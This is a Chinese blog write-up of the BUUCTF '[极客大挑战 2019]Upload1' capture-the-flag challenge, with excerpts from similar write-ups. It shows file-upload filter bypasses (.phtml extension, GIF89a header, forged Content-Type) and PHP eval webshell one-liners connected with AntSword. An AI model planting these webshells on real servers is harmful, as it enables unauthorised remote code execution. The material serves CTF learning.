ctf题集【BUUCTF WEB】[极客大挑战 2019]Upload1

最新推荐文章于 2025-03-30 17:44:18 发布
最新推荐文章于 2025-03-30 17:44:18 发布
阅读量1.4k 收藏 14
点赞数 9
分类专栏: CTF WEB 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42667028/article/details/135430298
版权
本文描述了一次通过文件上传功能进行安全渗透的过程,逐步测试上传限制,发现PHP后缀被过滤,然后通过嵌入GIF编码执行脚本,最终成功利用漏洞连接蚁剑并获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

拿到题目,发现是一个文件上传

1.先找图片存放路径,上传一个正常的照片

先尝试一下是否在upload目录下,/upload/pic.jpg

确认上传路径就是upload/XXX

2.上传图马

上传一个空的图片,用burp抓一下请求,改成php后缀,并添加一句话木马

看来是过滤了php后缀,尝试phtml后缀

过滤了<? 那么尝试改成  <script>alert("whoami")</script>

应该是检查了内容,尝试加入GIF89a

上传成功,接下来看看路径/upload/a.phtml 会不会执行alert方法

成功执行,看来script可以执行,接下来输入一句话木马

<script language="php">eval($_REQUEST['cmd']);</script>

成功上传,连接蚁剑,密码cmd

成功连接,获取flag

极客挑战2019-upload
m0_73303597的博客
12-11 416
自用
[极客挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
BUUCTF-[极客挑战 2019]Upload1
Monica的博客
09-14 2157
目: 分析: 一个文件上传漏洞 上传一个1.php文件内容为:<?php eval($_POST[1]);?> 发现报错。 查看源代码,没有关于过滤的代码,说明是后端进行的过滤。 bp抓包:修改MIME 报错说不能是php文件、绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 发现只要phtml文件可以使用,修改后缀为phtml phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 PHT文件是一个HTM.
BUUCTF [极客挑战 2019]Upload1
最新发布
2401_86572133的博客
03-30 495
脚本风格与简写风格可以绕过,但是煮波试了<% %>发现不行,看到佬温馨《提醒如果使用简写风格或者ASP风格,则应该在php.ini配置文件中修改如下配置,把这两个参数都设置为On,考虑到这两种风格的移植性较差,通常不推荐使用。最开始查的时候查到将一句话木马插入图片的方法,后来发现可以直接写一句话木马然后用burpsuite抓包的时候再修改数据包,进行绕过。直接地址+/upload+/(上传文件名),连接成功,找到flag。打开以后发现有文件上传的地方,不难看出是文件上传漏洞。还是不行,发生了什么?
BUUCTF——[极客挑战 2019]Upload 1
weixin_45864041的博客
09-26 1万+
文件上传漏洞,我们先写一句话木马,试着上传。 我们用shell.phtml的文件名直接上传,可以看到有一个前端检查,对文件后缀进行检查。接下来,我们将文件名改成shell.jpg进行上传。 然后又上传失败了,应该是在后端也对我们的文件内容进行了检测。接下来我们试着用文件幻术头的方式进行绕过。 在这里我试了jpg的文件头,但是还是失败了(也不知道为啥) 。最后用gif的文件头成功上传。 说明我们成功绕过了检测然后,我们重新上传,进行抓包,将文件后缀名改成phtml。 上传成功之后,没有给我们具体的存储.
Web-[极客挑战 2019] Upload1
汗的博客
05-21 1158
文章目录[极客挑战 2019]Upload1 [极客挑战 2019]Upload1 shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag ...
buuctf-web-[极客挑战 2019]Upload1
mlws1900的博客
08-11 1447
第一个点,修改phtml,第二个点GIF89a(这个点特别的重要,上面我写的代码没有包含),第三个点要用包含。scriptcmd.phtml是我们上传的webshell。我写的webshell里面加了phpinfo();上传的文件夹upload,找到我们上传的文件。bp后缀名修改phtml,加上下面代码。先上传一个无内容的jpg文件。文件里面要加GIF89a。蚁剑连接,获得flag。上传了一个小马代码为。...
[网络安全 CTF] BUUCTF极客挑战2019PHP解详析(Dirsearch使用实例+php反序列化)_[极客挑战 2019]php
2401_84971538的博客
05-13 755
自我介绍一下,小编13年上海交毕业,曾经在小公司待过,也去过华为、OPPO等厂,18年进入阿里一直到现在。深知多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Buuctf极客挑战2019upload
m0_64444909的博客
04-07 5370
文章目录一.划重点的知识点二.解步骤二、使用步骤1.引入库2.读入数据总结 一.划重点的知识点 GIF89a图片头文件欺骗: 一个GIF89a图形文件就是一个根据图形交换格式进行格式化之后的图形。用记事本编写一下内容,然后修改后缀变成图片 GIF89a <head> <meta http-equiv = "refresh" content = "1; url=http://www.***.com/" /> </head> 当单独查看此文件时,会出现G
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 1046
目 解过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF——[极客挑战 2019]Secret File 1
2303_77380355的博客
03-27 290
用burpsuite抓包,发现一个注释链接。得到base64,进行解码得到flag。F12查看源码,进入链接。进入flag.php查看。F12查看源码,没有东西。点击SECRET进入。F12源码里没有东西。进入链接发现一串源码。
BUUCTF-Web】[极客挑战 2019]Upload
weixin_49298681的博客
01-05 1246
Upload=> 文件上传漏洞。
BUUCTF——[极客挑战2019]Upload-1
weixin_62248541的博客
11-25 763
BUUCTF-[极客挑战2019]Upload-1
BUUCTF】[极客挑战 2019]Upload1
aoao331198的博客
03-13 1098
试着上传一个一句话木马的.jpg文件 <?phpeval($_GET['abc']); ?> 看样子是不能用php,必须换一种语言 仅仅更改文件后缀不能完全绕过,这里使用GIF89a头文件欺骗 GIF89a图片头文件欺骗 上传成功了,接下来我们在BP中上传,截获数据包,并且把 ...
BUUCTF---[极客挑战 2019]Upload1
2201_75556700的博客
03-03 743
2.点开链接,需要上传文件,要求是image,上传文件后缀为jpg的一句话木马,发现被检测到了。4.接下来使用bp抓包修改包的后缀为phtml,5.接下来使用蚁剑链接。3.换另一个木马试试。
[极客挑战 2019]Upload 1
xixixihan的博客
11-25 838
分享
kali[极客挑战 2019]upload 1
01-04
### Kali Linux 中用于极客挑战 2019 的文件上传指令 对于Kali Linux环境下参加极客挑战2019并涉及文件上传的情况,通常会涉及到使用特定平台提供的API或Web界面来完成文件提交的任务。然而,在很多CTF(Capture The Flag)竞赛场景下,尤其是像极客挑战这样的活动中,可能会遇到需要通过命令行工具来进行文件传输的需求。 常见的做法是利用`curl`命令实现文件上传功能。假设比赛官方提供了一个URL用于接收参赛者提交的作品,则可以采用如下方式构建上传请求: ```bash curl -F "file=@/path/to/local/file" http://example.com/upload_endpoint ``` 上述命令中的`-F`选项允许模拟HTML表单提交数据,其中`@`后面跟的是本地待上传文件的具体路径[^1]。 为了确保操作顺利进行,建议提前确认服务器端期望接收到的内容格式以及任何必要的认证参数。如果存在身份验证机制,可能还需要附加相应的凭证信息到请求头中去。 另外值得注意的是,在实际比赛中应当严格遵循主办方给出的指引和规定,避免因误操作而导致不必要的麻烦。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值